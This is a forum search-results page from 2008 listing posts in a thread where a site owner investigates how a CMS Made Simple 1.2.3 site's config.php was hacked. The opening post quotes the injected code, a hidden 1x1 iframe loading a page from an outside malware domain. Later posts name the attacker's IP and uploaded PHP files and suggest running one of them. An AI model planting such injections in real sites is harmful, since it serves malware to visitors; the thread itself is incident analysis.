Search found 6 matches
- Thu Mar 20, 2008 8:44 am
- Forum: General Discussion
- Topic: Site hacked (config.php), how come?
- Replies: 18
- Views: 8686
Re: Site hacked (config.php), how come?
The stupid thing is I need the upload folder to be executable as the stylesheet I use is located there (/uploads/images/templates). So I just made the upload folder read-execute, so no-one can drop any-stuff there. The down-side of that is that I need to change permission everytime I upload a pictur...
- Wed Mar 19, 2008 10:07 pm
- Forum: General Discussion
- Topic: Site hacked (config.php), how come?
- Replies: 18
- Views: 8686
Re: Site hacked (config.php), how come?
@larry:
Just install it in some safe place, and run it! it will ask for a pwd, but you can simply remove that from the code.
Just install it in some safe place, and run it! it will ask for a pwd, but you can simply remove that from the code.
- Wed Mar 19, 2008 11:57 am
- Forum: General Discussion
- Topic: Site hacked (config.php), how come?
- Replies: 18
- Views: 8686
Re: Site hacked (config.php), how come?
For anyone interested, these are the files he used, see attachement (I changed the php to txt). It appears the script creates a new user somehow....
- Wed Mar 19, 2008 10:06 am
- Forum: General Discussion
- Topic: Site hacked (config.php), how come?
- Replies: 18
- Views: 8686
Re: Site hacked (config.php), how come?
Ok, reading the logs it was done by 212.96.213.210
Using user 'test'
(WTF?), who also uploaded two files (dst2.php and image.php) in /uploads/images
Better dig a little deeper still.
Using user 'test'

Better dig a little deeper still.
- Wed Mar 19, 2008 9:41 am
- Forum: General Discussion
- Topic: Site hacked (config.php), how come?
- Replies: 18
- Views: 8686
Re: Site hacked (config.php), how come?
can you confirm the permissions set on your config file? secondly, i would be talking to my host, if this is a shared hosting environment, someone else on the same server may have accessed this file. it would be a good idea to be looking at your access logs to find out who changed it. -rw-rw-rw- c...
- Wed Mar 19, 2008 9:18 am
- Forum: General Discussion
- Topic: Site hacked (config.php), how come?
- Replies: 18
- Views: 8686
Site hacked (config.php), how come?
Hi all, My website, running CMS made simple 1.2.3 has been hacked, the following lines have been injected into config.php just after the <?php in the root of the site: echo '<__iframe src="http://acdedblshd.com/dl/adv530.php" width=1 height=1></__iframe>'; The code points to a site running...